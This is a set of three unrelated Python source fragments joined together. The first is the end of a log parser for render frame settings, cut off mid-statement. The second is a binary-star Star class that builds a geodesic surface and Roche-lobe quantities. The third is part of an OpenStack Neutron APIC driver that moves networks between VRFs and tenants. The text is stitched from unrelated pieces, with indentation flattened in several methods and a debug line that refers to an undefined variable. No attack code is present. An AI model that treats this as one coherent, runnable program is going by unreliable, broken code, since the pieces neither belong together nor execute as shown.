y = match_grp.group( 'y_resolution' )
y = int( y.replace( ',', '' ) )
d[ 'resolution' ] = ( x, y )
match_grp = re_opt_frame_settings_tile_size.match( msg_rest )
if match_grp :
x = match_grp.group( 'x_resolution' )
x = int( x.replace( ',', '' ) )
y = match_grp.group( 'y_resolution' )
y = int( y.replace( ',', '' ) )
d[ 'tile_size' ] = ( x, y )
match_grp = re_opt_frame_settings_pixel_format.match( msg_rest )
if match_grp :
d[ 'pixel_format' ] = match_grp.group( 'pixel_format' )
match_grp = re_opt_frame_settings_filter.match( msg_rest )
if match_grp :
d[ 'filter' ] = match_grp.group( 'filter' )
match_grp = re_opt_frame_settings_filter_size.match( msg_rest )
if match_grp :
d[ 'filter_size' ] = float( match_grp.group( 'filter_size' ) )
match_grp = re_opt_frame_settings_color_space.match( msg_rest )
if match_grp :
d[ 'color_space' ] = match_grp.group( 'color_space' )
match_grp = re_opt_frame_settings_premult_alpha.match( msg_rest )
if match_grp :
premult_alpha = match_grp.group( 'premult_alpha' )
d[ 'premult_alpha' ] = True if premult_alpha == 'on' else False
match_grp = re_opt_frame_settings_clamping.match( msg_rest )
if match_grp :
clamping = match_grp.group( 'clamping' )
d[ 'clamping' ] = True if clamping == 'on' else False
match_grp = re_opt_frame_settings_gamma_correction.match( msg_rest )
if match_grp :
d[ 'gamma_correction' ] = float( match_grp.group( 'gamma_correction' ) )
# latest line of the option
match_grp = re_opt_frame_settings_crop_window.match( msg_rest )
if match_grp :
x_top_left = match_grp.group( 'x_top_left' )
x_top_left = int( x_top_left.replace( ',', '' ) )
y_top_left = match_grp.group( 'y_top_left' )
y_top_left = int( y_top_left.replace( ',', '' ) )
x_bottom_right = match_grp.group( 'x_bottom_right' )
x_bottom_right = int( x_bottom_right.replace( ',', '' ) )
y_bottom_right = match_grp.group( 'y_bottom_right' )
y_bottom_right = int( y_bottom_right.replace( ',', '' ) )
d[ 'crop_window' ] = ( x_top_left , y_top_left ,
x_bottom_right , y_bottom_right )
triggereds.remove( 'frame_settings' | |
# Licensed under a 3-clause BSD style license - see LICENSE
from __future__ import print_function, division
__all__ = ["Star"]
from ..Utils.import_modules import *
from .. import Utils
from .Star_base import Star_base
logger = logging.getLogger(__name__)
######################## class Star ########################
class Star(Star_base):
"""Star(Star_base)
This class allows determine the flux of the companion star
in a binary system using an atmosphere grid. It is derived
from the Star_base class.
The noticeable difference is that the surface is constructed
from a geodesic tesselation of equilateral triangles derived
from an isocahedron.
Axis convention:
x: From the primary center of mass towards the secondary.
y: Along the orbital plane along the orbital motion.
z: Along the orbital angular momentum.
"""
def __init__(self, ndiv, atmo_grid=None, read=False, oldchi=False):
    """__init__(self, ndiv, atmo_grid=None, read=False, oldchi=False)
    Construct the geodesic star surface.

    ndiv: tessellation subdivision level, forwarded to Star_base.
    atmo_grid (None): atmosphere grid, forwarded to Star_base.
    read (False): if True, read a precalculated geodesic from the
        restart file instead of generating it with PyGTS.
    oldchi (False): stored as-is on the instance (consumed elsewhere).
    """
    Star_base.__init__(self, ndiv, atmo_grid=atmo_grid)
    # Pick the surface-construction strategy, then run it.
    initialize = self._Read_geodesic if read else self._New_Initialization
    initialize()
    self.oldchi = oldchi
def _New_Initialization(self):
    """_New_Initialization(self)
    Run important initialization steps important for the
    class to work, generating the geodesic surface with PyGTS.

    Fills in:
    self.vertices contains x,y,z coordinates of vertices. shape = self.n_vertices,3
    self.faces contains indices of vertices forming faces. shape = self.n_faces,3
    self.assoc contains indices of faces associated to a vertice. shape = self.n_vertices,6
        Note: when only 5 faces associated, 6th value is equal to -99
    Also precomputes self.pre_area (per-face area before the rc^2
    scaling) and the face-center direction cosines self.cosx/cosy/cosz.

    Falls back to _Read_geodesic() when the PyGTS package is missing.
    """
    print( "Generating the geodesic surface using PyGTS" )
    try:
        import gts
    # Catch only ImportError: the original bare `except:` would also have
    # swallowed KeyboardInterrupt/SystemExit and any unrelated error.
    except ImportError:
        print( "You likely don't have the PyGTS package installed on your computer." )
        print( "It is impossible to create the surface vertices from scratch." )
        print( "Will trying reading them from the restart file instead." )
        self._Read_geodesic()
        return
    # Generate the geodesic primitives
    s = gts.sphere(self.ndiv)
    x,y,z,t = gts.get_coords_and_face_indices(s,True)
    self.vertices = np.c_[x,y,z]
    self.faces = np.array(t)
    self.n_vertices = self.vertices.shape[0]
    self.n_faces = self.faces.shape[0]
    print( "Calculatating the associations" )
    self.assoc = Utils.Tessellation.Match_assoc(self.faces, self.n_vertices)
    # We will pre-calculate the surface areas. They will need to be multiplied by rc^2.
    # The calculation is simply the Pythagorean sum of the areas of the respective projections on the x,y,z planes.
    print( "meshing the surface" )
    # mesh[i] holds the three (x,y,z) vertex positions of face i. shape = n_faces,3,3
    mesh = self.vertices[self.faces]
    print( "calculating the area" )
    # Each parenthesized difference is twice the signed (shoelace) area of the
    # face projected on one coordinate plane; pre_area is their Pythagorean sum.
    self.pre_area = 0.5 *np.sqrt( ((mesh[:,0,0]*mesh[:,1,1]+mesh[:,1,0]*mesh[:,2,1]+mesh[:,2,0]*mesh[:,0,1]) - (mesh[:,0,1]*mesh[:,1,0]+mesh[:,1,1]*mesh[:,2,0]+mesh[:,2,1]*mesh[:,0,0]))**2 + ((mesh[:,0,1]*mesh[:,1,2]+mesh[:,1,1]*mesh[:,2,2]+mesh[:,2,1]*mesh[:,0,2]) - (mesh[:,0,2]*mesh[:,1,1]+mesh[:,1,2]*mesh[:,2,1]+mesh[:,2,2]*mesh[:,0,1]))**2 + ((mesh[:,0,2]*mesh[:,1,0]+mesh[:,1,2]*mesh[:,2,0]+mesh[:,2,2]*mesh[:,0,0]) - (mesh[:,0,0]*mesh[:,1,2]+mesh[:,1,0]*mesh[:,2,2]+mesh[:,2,0]*mesh[:,0,2]))**2 )
    # The cosine of x,y,z for the center of the faces. shape = n_faces, 3
    print( "calculating the angles" )
    self.cosx, self.cosy, self.cosz = mesh.mean(axis=1).T
    return
def _Initialization(self):
    """Initialization(self)
    Run important initialization steps important for the
    class to work, using the package's own tessellation code
    (Utils.Tessellation.Make_geodesic) rather than PyGTS.

    self.vertices contains x,y,z coordinates of vertices. shape = self.n_vertices,3
    self.faces contains indices of vertices forming faces. shape = self.n_faces,3
    self.assoc contains indices of faces associated to a vertice. shape = self.n_vertices,6
        Note: when only 5 faces associated, 6th value is equal to -99
    """
    print( "Generating the geodesic surface" )
    # Generate the geodesic primitives
    self.n_faces, self.n_vertices, self.faces, self.vertices, self.assoc = Utils.Tessellation.Make_geodesic(self.ndiv)
    # We will pre-calculate the surface areas. They will need to be multiplied by rc^2.
    # The calculation is simply the Pythagorean sum of the areas of the respective projections on the x,y,z planes.
    print( "meshing the surface" )
    # mesh[i] holds the three (x,y,z) vertex positions of face i. shape = n_faces,3,3
    mesh = self.vertices[self.faces]
    print( "calculating the area" )
    # Each parenthesized difference is twice the signed (shoelace) area of the
    # face projected on one coordinate plane; pre_area is their Pythagorean sum.
    self.pre_area = 0.5 *np.sqrt( ((mesh[:,0,0]*mesh[:,1,1]+mesh[:,1,0]*mesh[:,2,1]+mesh[:,2,0]*mesh[:,0,1]) - (mesh[:,0,1]*mesh[:,1,0]+mesh[:,1,1]*mesh[:,2,0]+mesh[:,2,1]*mesh[:,0,0]))**2 + ((mesh[:,0,1]*mesh[:,1,2]+mesh[:,1,1]*mesh[:,2,2]+mesh[:,2,1]*mesh[:,0,2]) - (mesh[:,0,2]*mesh[:,1,1]+mesh[:,1,2]*mesh[:,2,1]+mesh[:,2,2]*mesh[:,0,1]))**2 + ((mesh[:,0,2]*mesh[:,1,0]+mesh[:,1,2]*mesh[:,2,0]+mesh[:,2,2]*mesh[:,0,0]) - (mesh[:,0,0]*mesh[:,1,2]+mesh[:,1,0]*mesh[:,2,2]+mesh[:,2,0]*mesh[:,0,2]))**2 )
    # The cosine of x,y,z for the center of the faces. shape = n_faces, 3
    print( "calculating the angles" )
    self.cosx, self.cosy, self.cosz = mesh.mean(axis=1).T
    return
def Outline(self, ntheta=100, debug=False):
    """Outline(ntheta=100, debug=False)
    Return the radii of the outline of the star sampled at
    theta = np.arange(ntheta)/ntheta*cts.TWOPI, where theta is
    defined as np.arctan2(y_projected, z_projected), starting at
    theta0 = 0 with step dtheta = cts.TWOPI/ntheta.

    ntheta (100): Number of points defining the outline.
    debug (False): Print debug information when True.

    >>> radii = self.Outline()
    """
    if debug: print( 'Begin _Outline()' )
    # Sample the full revolution uniformly.
    angles = np.arange(ntheta, dtype=float)/ntheta * cts.TWOPI
    y_proj = np.cos(angles)
    z_proj = np.sin(angles)
    # The outline lies in the x=0 plane as seen from the projection axis.
    return self._Radius(np.zeros_like(y_proj), y_proj, z_proj, self.psi0, self.rc_eq)
def _Read_geodesic(self):
    """Read_geodesic()
    The information about the geodesic surface on the unit
    sphere has already been precalculated. We simply load the
    one having the desired precision (self.ndiv) from the
    package's 'geodesic' data directory.
    """
    # Utils.__path__[0][:-5] strips the trailing 'Utils' to reach the package root.
    # A context manager guarantees the file is closed even if parsing fails
    # (the original code never closed the handle).
    with open(Utils.__path__[0][:-5]+'geodesic/geodesic_n%i.txt'%self.ndiv, 'r') as f:
        lines = f.readlines()
    # We store the number of vertices, faces and edges as class variables.
    tmp, self.n_vertices, self.n_faces, self.n_edges = lines[0].split()
    self.n_vertices = int(self.n_vertices)
    self.n_faces = int(self.n_faces)
    self.n_edges = int(self.n_edges)
    # Vertice information contains coordinate x,y,z of vertices. shape = n_vertices,3
    self.vertices = np.array([l.split() for l in lines[1:1+self.n_vertices]], dtype=float)
    # Face information contains indices of vertices forming faces. shape = n_faces,3
    self.faces = np.array([l.split() for l in lines[1+self.n_vertices:1+self.n_vertices+self.n_faces]], dtype=int)
    # Drop the first column of each face record (not a vertex index —
    # presumably a vertex count/tag; TODO(review) confirm file format).
    self.faces = self.faces[:,1:]
    # We calculate the associations
    self.assoc = Utils.Tessellation.Match_assoc(self.faces, self.n_vertices)
    # We will pre-calculate the surface areas. They will need to be multiplied by rc^2.
    # The calculation is simply the Pythagorean sum of the areas of the respective projections on the x,y,z planes.
    mesh = self.vertices[self.faces]
    self.pre_area = 0.5 *np.sqrt( ((mesh[:,0,0]*mesh[:,1,1]+mesh[:,1,0]*mesh[:,2,1]+mesh[:,2,0]*mesh[:,0,1]) - (mesh[:,0,1]*mesh[:,1,0]+mesh[:,1,1]*mesh[:,2,0]+mesh[:,2,1]*mesh[:,0,0]))**2 + ((mesh[:,0,1]*mesh[:,1,2]+mesh[:,1,1]*mesh[:,2,2]+mesh[:,2,1]*mesh[:,0,2]) - (mesh[:,0,2]*mesh[:,1,1]+mesh[:,1,2]*mesh[:,2,1]+mesh[:,2,2]*mesh[:,0,1]))**2 + ((mesh[:,0,2]*mesh[:,1,0]+mesh[:,1,2]*mesh[:,2,0]+mesh[:,2,2]*mesh[:,0,0]) - (mesh[:,0,0]*mesh[:,1,2]+mesh[:,1,0]*mesh[:,2,2]+mesh[:,2,0]*mesh[:,0,2]))**2 )
    # The cosine of x,y,z for the center of the faces. shape = n_faces, 3
    self.cosx, self.cosy, self.cosz = mesh.mean(axis=1).T
    return
def Radius(self):
    """Radius()
    Return the volume-averaged radius of the star, in
    units of orbital separation: the cube root of the
    mean of the cubed per-face radii.

    >>> self.Radius()
    """
    mean_cubed_radius = np.mean(self.rc**3)
    return mean_cubed_radius**(1./3)
def Roche(self):
    """Roche()
    Return the volume-averaged Roche lobe radius of the star
    in units of orbital separation.

    Since every surface element of the geodesic tessellation
    subtends the same solid angle, the volume-averaged radius is
    simply <rc^3>^(1/3), as computed by Radius().

    >>> self.Roche()
    """
    saved_filling = self.filling
    # Temporarily inflate the star so it exactly fills its Roche lobe.
    self.Make_surface(filling=1.)
    roche_radius = self.Radius()
    # Restore the original surface before returning.
    self.Make_surface(filling=saved_filling)
    return roche_radius
def _Surface(self, debug=False):
"""_Surface(debug=False)
Calculates the surface grid values of surface gravity
and surface element area by solving the potential
equation.
debug (False): Print debug information when True.
>>> self._Surface()
"""
logger.log(9, "start")
if debug: print( 'Begin _Surface()' )
## Calculate some quantities
self._Calc_qp1by2om2()
## Saddle point, i.e. the Roche-lobe radius at L1 (on the near side)
xl1 = self._Saddle(0.5)
self.L1 = xl1
if debug: print( 'Saddle %f' %xl1 )
## Potential at the saddle point, L1
psil1 = self._Potential(xl1, 0., 0.)[-1]
if debug: print( 'Potential psil1 %f' %psil1 )
## rc_l1 is the stellar radius on the near side, i.e. the nose of the star
self.rc_l1 = self.filling*xl1
if debug: print( 'rc_l1 %f' %self.rc_l1 )
## Potential at rc_l1, the nose of the star
trc, trx, dpsi, dpsidx, dpsidy, dpsidz, psi0 = self._Potential(self.rc_l1, 0., 0.)
self.psi0 = psi0
if debug: print( 'Potential psi0\n trc: %f, trx %f, dpsi %f, dpsidx %f, dpsidy %f, dpsidz %f, psi0 %f' % (trc, trx, dpsi, dpsidx, dpsidy, dpsidz, self.psi0) )
## rc_pole is stellar radius at 90 degrees, i.e. at the pole, which is perpendicular to the line separating the two stars and the orbital plane
if debug: print( 'psi0,r '+str(self.psi0)+' '+str(r) )
self.rc_pole = self._Radius(0.,0.,1.,self.psi0,self.rc_l1)
trc, trx, dpsi, dpsidx, dpsidy, dpsidz, psi = self._Potential(0.,0.,self.rc_pole)
## log surface gravity at the pole of the star
self.logg_pole = np.log10(np.sqrt(dpsidx**2+dpsidy**2+dpsidz**2))
## rc_eq is stellar radius at 90 degrees in the orbital plane, i.e. at the equator, but not in the direction of the companion
self.rc_eq = self._Radius(0.,1.,0.,self.psi0,self.rc_l1)
trc, trx, dpsi, dpsidx, dpsidy, dpsidz, psi = self._Potential(0.,self.rc_eq,0.)
## log surface gravity at the pole of the star
self.logg_eq = np.log10(np.sqrt(dpsidx**2+dpsidy**2+dpsidz**2))
## r_vertices are the radii of the vertices. shape = n_vertices
self.r_vertices = self._Radius(self.vertices[:,0], self.vertices[:,1], self.vertices[:,2], self.psi0, self.rc_l1)
### Calculate useful quantities for all surface elements
## rc corresponds to r1 from Tjemkes et al., the distance from the center of mass of the pulsar companion. shape = n_faces
self.rc = self._Radius(self.cosx, self.cosy, self.cosz, self.psi0, self.rc_l1)
## rx corresponds to r2 from Tjemkes et al., the distance from the center of mass of the pulsar. shape = n_faces
trc, self.rx, dpsi, dpsidx, dpsidy, dpsidz, psi = self._Potential(self.rc*self.cosx,self.rc*self.cosy,self.rc*self.cosz)
## log surface gravity. shape = n_faces
geff = self._Geff(dpsidx, dpsidy, dpsidz)
self.logg = np.log10(geff)
## gradient of the gravitational potential in x,y,z. shape = n_faces
self.gradx = -dpsidx/geff
self.grady = -dpsidy/geff
self.gradz = -dpsidz/geff
## coschi is the cosine angle between | |
"'%(net_name)s' in project %(net_tenant)s with VRF %(vrf)s",
{'net_id': network_db.id, 'net_name': network_db.name,
'net_tenant': network_db.tenant_id, 'vrf': new_vrf})
# NOTE: Must only be called for networks that are not yet
# attached to any router.
session = aim_ctx.db_session
old_tenant_name = self.name_mapper.project(
session, network_db.tenant_id)
if (new_vrf.tenant_name != COMMON_TENANT_NAME and
old_tenant_name != new_vrf.tenant_name):
# Move BD and EPG to new VRF's Tenant, set VRF, and make
# sure routing is enabled.
LOG.debug("Moving network from tenant %(old)s to tenant %(new)s",
{'old': old_tenant_name, 'new': new_vrf.tenant_name})
bd, epg = self._map_network(session, network_db, None)
bd = self.aim.get(aim_ctx, bd)
self.aim.delete(aim_ctx, bd)
bd.tenant_name = new_vrf.tenant_name
bd.enable_routing = True
bd.vrf_name = new_vrf.name
bd = self.aim.create(aim_ctx, bd)
epg = self.aim.get(aim_ctx, epg)
self.aim.delete(aim_ctx, epg)
# ensure app profile exists in destination tenant
ap = aim_resource.ApplicationProfile(
tenant_name=new_vrf.tenant_name, name=self.ap_name)
if not self.aim.get(aim_ctx, ap):
self.aim.create(aim_ctx, ap)
epg.tenant_name = new_vrf.tenant_name
epg = self.aim.create(aim_ctx, epg)
else:
# Just set VRF and enable routing.
bd, epg = self._map_network(session, network_db, new_vrf)
bd = self.aim.update(aim_ctx, bd, enable_routing=True,
vrf_name=new_vrf.name)
# All non-router ports on this network need to be notified
# since their BD's VRF and possibly their BD's and EPG's
# Tenants have changed.
nets_to_notify.add(network_db.id)
return bd, epg
def _dissassociate_network_from_vrf(self, aim_ctx, network_db, old_vrf,
                                    nets_to_notify):
    """Detach network_db from old_vrf, reverting it to the unrouted VRF.

    Moves the network's BridgeDomain and EndpointGroup back to the
    network project's own AIM Tenant when necessary, points the BD at
    the default "unrouted" VRF and disables routing.  The network id is
    added to nets_to_notify so its ports get notified of the change.
    (Method name spelling kept as-is: callers use it.)
    """
    LOG.debug("Dissassociating network %(net_id)s named '%(net_name)s' in "
              "project %(net_tenant)s from VRF %(vrf)s",
              {'net_id': network_db.id, 'net_name': network_db.name,
               'net_tenant': network_db.tenant_id, 'vrf': old_vrf})
    session = aim_ctx.db_session
    bd, epg = self._map_network(session, network_db, old_vrf)
    new_vrf = self._map_unrouted_vrf()
    new_tenant_name = self.name_mapper.project(
        session, network_db.tenant_id)
    # REVISIT(rkukura): Share code with _associate_network_with_vrf?
    if (old_vrf.tenant_name != COMMON_TENANT_NAME and
        old_vrf.tenant_name != new_tenant_name):
        # Move BD and EPG to network's Tenant, set unrouted VRF,
        # and disable routing.  The tenant change is done as
        # delete + re-create (apparently the tenant is part of the
        # AIM resource identity, so update cannot re-home it).
        LOG.debug("Moving network from tenant %(old)s to tenant %(new)s",
                  {'old': old_vrf.tenant_name, 'new': new_tenant_name})
        bd = self.aim.get(aim_ctx, bd)
        self.aim.delete(aim_ctx, bd)
        bd.tenant_name = new_tenant_name
        bd.enable_routing = False
        bd.vrf_name = new_vrf.name
        bd = self.aim.create(aim_ctx, bd)
        epg = self.aim.get(aim_ctx, epg)
        self.aim.delete(aim_ctx, epg)
        epg.tenant_name = new_tenant_name
        epg = self.aim.create(aim_ctx, epg)
    else:
        # Just set unrouted VRF and disable routing.
        bd = self.aim.update(aim_ctx, bd, enable_routing=False,
                             vrf_name=new_vrf.name)
    # All non-router ports on this network need to be notified
    # since their BD's VRF and possibly their BD's and EPG's
    # Tenants have changed.
    nets_to_notify.add(network_db.id)
def _move_topology(self, aim_ctx, topology, old_vrf, new_vrf,
                   nets_to_notify):
    """Re-home every network of a routed topology from old_vrf to new_vrf.

    Arguments:
    aim_ctx -- AIM context wrapping the DB session
    topology -- dict mapping network id -> network DB record
    old_vrf, new_vrf -- source and destination AIM VRF resources
    nets_to_notify -- set collecting the ids of networks whose
        non-router ports must be notified afterwards
    """
    LOG.info(_LI("Moving routed networks %(topology)s from VRF "
                 "%(old_vrf)s to VRF %(new_vrf)s"),
             {'topology': topology.keys(),
              'old_vrf': old_vrf,
              'new_vrf': new_vrf})
    # TODO(rkukura): Validate that nothing in new_vrf overlaps
    # with topology.
    session = aim_ctx.db_session
    # NOTE(review): itervalues() is Python-2 only.
    for network_db in topology.itervalues():
        if old_vrf.tenant_name != new_vrf.tenant_name:
            # New VRF is in different Tenant, so move BD, EPG, and
            # all Subnets to new VRF's Tenant and set BD's VRF.
            # The tenant change is done as delete + re-create
            # (apparently the tenant is part of the AIM identity).
            LOG.debug("Moving network %(net)s from tenant %(old)s to "
                      "tenant %(new)s",
                      {'net': network_db.id,
                       'old': old_vrf.tenant_name,
                       'new': new_vrf.tenant_name})
            bd, epg = self._map_network(session, network_db, old_vrf)
            old_bd = self.aim.get(aim_ctx, bd)
            new_bd = copy.copy(old_bd)
            new_bd.tenant_name = new_vrf.tenant_name
            new_bd.vrf_name = new_vrf.name
            bd = self.aim.create(aim_ctx, new_bd)
            # Re-home all of the old BD's Subnets onto the new BD
            # before deleting the old BD itself.
            for subnet in self.aim.find(
                    aim_ctx, aim_resource.Subnet,
                    tenant_name=old_bd.tenant_name, bd_name=old_bd.name):
                self.aim.delete(aim_ctx, subnet)
                subnet.tenant_name = bd.tenant_name
                subnet = self.aim.create(aim_ctx, subnet)
            self.aim.delete(aim_ctx, old_bd)
            epg = self.aim.get(aim_ctx, epg)
            self.aim.delete(aim_ctx, epg)
            epg.tenant_name = new_vrf.tenant_name
            epg = self.aim.create(aim_ctx, epg)
        else:
            # New VRF is in same Tenant, so just set BD's VRF.
            bd, _ = self._map_network(session, network_db, new_vrf)
            bd = self.aim.update(aim_ctx, bd, vrf_name=new_vrf.name)
    # All non-router ports on all networks in topology need to be
    # notified since their BDs' VRFs and possibly their BDs' and
    # EPGs' Tenants have changed.
    nets_to_notify.update(topology.keys())
def _router_topology(self, session, router_id):
    """Return the routed topology reachable from router_id.

    The result is a dict mapping network id -> network DB record for
    every network transitively connected to the router through
    router interfaces.
    """
    LOG.debug("Getting topology for router %s", router_id)
    networks = {}
    router_ids = set()
    self._expand_topology_for_routers(session, networks, router_ids,
                                      [router_id])
    LOG.debug("Returning router topology %s", networks)
    return networks
def _network_topology(self, session, network_db):
LOG.debug("Getting topology for network %s", network_db.id)
visited_networks = {}
visited_router_ids = set()
self._expand_topology_for_networks(
session, visited_networks, visited_router_ids, [network_db])
LOG.debug("Returning network topology %s", visited_networks)
return visited_networks
    def _expand_topology_for_routers(self, session, visited_networks,
                                     visited_router_ids, new_router_ids):
        """Add routers, and the networks interfaced to them, to a topology.

        Recurses mutually with _expand_topology_for_networks until no new
        routers or networks are discovered. Both visited_networks (dict of
        network id -> network DB object) and visited_router_ids (set) are
        updated in place.
        """
        LOG.debug("Adding routers %s to topology", new_router_ids)
        # Only routers not already visited contribute new networks.
        added_ids = set(new_router_ids) - visited_router_ids
        if added_ids:
            visited_router_ids |= added_ids
            LOG.debug("Querying for networks interfaced to routers %s",
                      added_ids)
            query = (session.query(models_v2.Network).
                     join(models_v2.Port).
                     join(l3_db.RouterPort).
                     filter(l3_db.RouterPort.router_id.in_(added_ids)))
            if visited_networks:
                # Exclude networks already in the topology.
                query = query.filter(
                    ~models_v2.Network.id.in_(visited_networks.keys()))
            results = (query.filter(l3_db.RouterPort.port_type ==
                                    n_constants.DEVICE_OWNER_ROUTER_INTF).
                       distinct().
                       all())
            self._expand_topology_for_networks(
                session, visited_networks, visited_router_ids, results)
    def _expand_topology_for_networks(self, session, visited_networks,
                                      visited_router_ids, new_networks):
        """Add networks, and the routers interfaced to them, to a topology.

        Recurses mutually with _expand_topology_for_routers until no new
        routers or networks are discovered. Both visited_networks (dict of
        network id -> network DB object) and visited_router_ids (set) are
        updated in place.
        """
        LOG.debug("Adding networks %s to topology",
                  [net.id for net in new_networks])
        added_ids = []
        for net in new_networks:
            if net.id not in visited_networks:
                visited_networks[net.id] = net
                added_ids.append(net.id)
        if added_ids:
            LOG.debug("Querying for routers interfaced to networks %s",
                      added_ids)
            query = (session.query(l3_db.RouterPort.router_id).
                     join(models_v2.Port).
                     filter(models_v2.Port.network_id.in_(added_ids)))
            if visited_router_ids:
                # Exclude routers already in the topology.
                query = query.filter(
                    ~l3_db.RouterPort.router_id.in_(visited_router_ids))
            results = (query.filter(l3_db.RouterPort.port_type ==
                                    n_constants.DEVICE_OWNER_ROUTER_INTF).
                       distinct().
                       all())
            self._expand_topology_for_routers(
                session, visited_networks, visited_router_ids,
                # Each result row is a 1-tuple containing the router id.
                [result[0] for result in results])
def _topology_shared(self, topology):
for network_db in topology.values():
for entry in network_db.rbac_entries:
# Access is enforced by Neutron itself, and we only
# care whether or not the network is shared, so we
# ignore the entry's target_tenant.
if entry.action == rbac_db_models.ACCESS_SHARED:
return network_db
def _ip_for_subnet(self, subnet, fixed_ips):
subnet_id = subnet['id']
for fixed_ip in fixed_ips:
if fixed_ip['subnet_id'] == subnet_id:
return fixed_ip['ip_address']
    def _subnet_router_ips(self, session, subnet_id):
        """Query (ip_address, router_id) for every router interface port
        that has an IP allocation on the given subnet.

        Returns the SQLAlchemy query itself (iterable of row tuples), not
        a materialized list.
        """
        return (session.query(models_v2.IPAllocation.ip_address,
                              l3_db.RouterPort.router_id).
                join(models_v2.Port).
                filter(
                    models_v2.IPAllocation.subnet_id == subnet_id,
                    l3_db.RouterPort.port_type ==
                    n_constants.DEVICE_OWNER_ROUTER_INTF
                ))
def _scope_by_id(self, session, scope_id):
return (session.query(address_scope_db.AddressScope).
filter_by(id=scope_id).
one())
def _map_network(self, session, network, vrf, bd_only=False):
tenant_aname = (vrf.tenant_name
if vrf and vrf.tenant_name != COMMON_TENANT_NAME
else self.name_mapper.project(
session, network['tenant_id']))
id = network['id']
aname = self.name_mapper.network(session, id)
bd = aim_resource.BridgeDomain(tenant_name=tenant_aname,
name=aname)
if bd_only:
return bd
epg = aim_resource.EndpointGroup(tenant_name=tenant_aname,
app_profile_name=self.ap_name,
name=aname)
return bd, epg
def _map_external_network(self, session, network):
l3out, ext_net, ns = self._get_aim_nat_strategy(network)
if ext_net:
aim_ctx = aim_context.AimContext(db_session=session)
for o in (ns.get_l3outside_resources(aim_ctx, l3out) or []):
if isinstance(o, aim_resource.EndpointGroup):
return o
def _map_subnet(self, subnet, gw_ip, bd):
prefix_len = subnet['cidr'].split('/')[1]
gw_ip_mask = gw_ip + '/' + prefix_len
sn = aim_resource.Subnet(tenant_name=bd.tenant_name,
bd_name=bd.name,
gw_ip_mask=gw_ip_mask)
return sn
def _map_address_scope(self, session, scope):
id = scope['id']
extn_db = extension_db.ExtensionDbMixin()
scope_extn = extn_db.get_address_scope_extn_db(session, id)
if scope_extn and scope_extn.get(cisco_apic.VRF):
vrf = aim_resource.VRF.from_dn(scope_extn[cisco_apic.VRF])
else:
tenant_aname = self.name_mapper.project(
session, scope['tenant_id'])
aname = self.name_mapper.address_scope(session, id)
vrf = aim_resource.VRF(tenant_name=tenant_aname, name=aname)
return vrf
def _map_router(self, session, router, contract_only=False):
id = router['id']
aname = self.name_mapper.router(session, id)
contract = aim_resource.Contract(tenant_name=COMMON_TENANT_NAME,
name=aname)
if contract_only:
return contract
subject = aim_resource.ContractSubject(tenant_name=COMMON_TENANT_NAME,
contract_name=aname,
name=ROUTER_SUBJECT_NAME)
return contract, subject
def _map_default_vrf(self, session, network):
tenant_aname = self.name_mapper.project(session, network['tenant_id'])
vrf = aim_resource.VRF(tenant_name=tenant_aname,
name=DEFAULT_VRF_NAME)
return vrf
def _map_unrouted_vrf(self):
vrf = aim_resource.VRF(
tenant_name=COMMON_TENANT_NAME,
name=self.apic_system_id + '_' + UNROUTED_VRF_NAME)
return vrf
def _ensure_common_tenant(self, aim_ctx):
attrs = aim_resource.Tenant(name=COMMON_TENANT_NAME,
display_name=aim_utils.sanitize_display_name('CommonTenant'))
tenant = self.aim.get(aim_ctx, attrs)
if not tenant:
LOG.info(_LI("Creating common tenant"))
tenant = self.aim.create(aim_ctx, attrs)
return tenant
def _ensure_unrouted_vrf(self, aim_ctx):
self._ensure_common_tenant(aim_ctx)
attrs = self._map_unrouted_vrf()
vrf = self.aim.get(aim_ctx, attrs)
if not vrf:
attrs.display_name = (
aim_utils.sanitize_display_name('CommonUnroutedVRF'))
LOG.info(_LI("Creating common unrouted VRF"))
vrf = self.aim.create(aim_ctx, attrs)
return vrf
def _ensure_any_filter(self, aim_ctx):
self._ensure_common_tenant(aim_ctx)
filter_name = self.apic_system_id + '_' + ANY_FILTER_NAME
dname = aim_utils.sanitize_display_name("AnyFilter")
filter = aim_resource.Filter(tenant_name=COMMON_TENANT_NAME,
name=filter_name,
display_name=dname)
if not self.aim.get(aim_ctx, filter):
LOG.info(_LI("Creating common Any Filter"))
self.aim.create(aim_ctx, filter)
dname = aim_utils.sanitize_display_name("AnyFilterEntry")
entry = aim_resource.FilterEntry(tenant_name=COMMON_TENANT_NAME,
filter_name=filter_name,
name=ANY_FILTER_ENTRY_NAME,
display_name=dname)
if not self.aim.get(aim_ctx, entry):
LOG.info(_LI("Creating common Any FilterEntry"))
self.aim.create(aim_ctx, entry)
return filter
def _ensure_default_vrf(self, aim_ctx, attrs):
vrf = self.aim.get(aim_ctx, attrs)
if not vrf:
attrs.display_name = (
aim_utils.sanitize_display_name('DefaultRoutedVRF'))
LOG.info(_LI("Creating default VRF for %s"), attrs.tenant_name)
vrf = self.aim.create(aim_ctx, attrs)
return vrf
    def _get_epg_for_network(self, session, network):
        """Return the AIM EndpointGroup for a network, internal or external."""
        if self._is_external(network):
            return self._map_external_network(session, network)
        # REVISIT(rkukura): Can the network_db be passed in?
        network_db = (session.query(models_v2.Network).
                      filter_by(id=network['id']).
                      one())
        vrf = self._get_routed_vrf_for_network(session, network_db)
        # _map_network returns (bd, epg); only the EPG is needed here.
        return self._map_network(session, network_db, vrf)[1]
# DB Configuration callbacks
    def _set_enable_metadata_opt(self, new_conf):
        """DB config callback: cache the updated enable_metadata_opt value."""
        self.enable_metadata_opt = new_conf['value']
    def _set_enable_dhcp_opt(self, new_conf):
        """DB config callback: cache the updated enable_dhcp_opt value."""
        self.enable_dhcp_opt = new_conf['value']
    def _set_ap_name(self, new_conf):
        """DB config callback: cache the updated application profile name."""
        self.ap_name = new_conf['value']
def get_aim_domains(self, aim_ctx):
vmms = [x.name for x in self.aim.find(aim_ctx, aim_resource.VMMDomain)
if x.type == utils.OPENSTACK_VMM_TYPE]
phys = [x.name for x in
self.aim.find(aim_ctx, aim_resource.PhysicalDomain)]
return vmms, phys
    def _is_external(self, network):
        """Return the network's router:external value (truthy if external,
        None when the key is absent)."""
        return network.get('router:external')
def _nat_type_to_strategy(self, nat_type):
ns_cls = nat_strategy.DistributedNatStrategy
if nat_type == '':
ns_cls = nat_strategy.NoNatStrategy
elif nat_type == 'edge':
ns_cls = nat_strategy.EdgeNatStrategy
ns = ns_cls(self.aim)
ns.app_profile_name = self.ap_name
return ns
    def _get_aim_nat_strategy(self, network):
        """Return (L3Outside, ExternalNetwork, nat strategy) for a network.

        Returns (None, None, None) unless the network is external and has
